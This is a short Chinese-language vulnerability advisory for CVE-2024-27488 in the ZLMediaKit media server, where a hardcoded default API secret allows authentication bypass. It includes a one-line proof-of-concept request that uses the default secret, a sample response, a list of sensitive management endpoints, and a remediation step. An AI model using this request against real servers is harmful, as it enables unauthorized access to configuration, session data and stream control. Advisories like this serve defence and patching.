CVE-2024-27488_ ZLMediaKit 安全漏洞

CVSS评分：9.8分

CVE-2024-27488_ ZLMediaKit 安全漏洞

• [1. 漏洞原理](#1. 漏洞原理)
• [2. 漏洞危害](#2. 漏洞危害)
• [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

CVE-2024-27488 是 ZLMediaKit 的"硬编码/默认 API 密钥"导致的访问控制缺陷 ------ ZLMediaKit 默认开启 HTTP 管理/控制 API，使用 secret 参数做认证，但默认/示例配置里有硬编码的 secret/示例 secret（或弱随机值），攻击者可利用这一点绕过认证，调用管理类 API（获取配置、会话、控制流、删除/添加代理、kick 等），实现信息泄露或权限滥用。

漏洞参考链接：

• https://github.com/advisories/GHSA-8vjg-37gr-gvx7
• https://nvd.nist.gov/vuln/detail/CVE-2024-27488

硬编码的地址：https://docs.zlmediakit.com/guide/media_server/config_file.html

漏洞验证 poc：

GET /index/?secret=035c73f7-bb6b-4889-a715-d9eb2d1925cc

请求的响应类似于：

{
  "code" : 0,
  "data" : [
    "/index/",
    "/index/api/addFFmpegSource",
    "/index/api/addStreamProxy",
    "/index/api/addStreamPusherProxy",
    "/index/api/closeRtpServer",
    ...
  ]
}

2. 漏洞危害

该漏洞利用难度极低，通过未授权调用 api 接口，可实现一些未授权的操作，例如：

• /index/api/getServerConfig --- 获取服务配置（可能泄露路径、密钥等）
• /index/api/getMediaList --- 当前流列表与来源信息
• /index/api/getAllSession --- 会话/连接详情
• /index/api/kick_session --- 踢掉会话（验证时请勿滥用）

3. 漏洞修复

在 conf/config.ini 或运行参数中明确设置强随机 secret（足够长度，字母+数字+符号），并且不要使用示例/默认值 035c73f7-bb6b-4889-a715-d9eb2d1925cc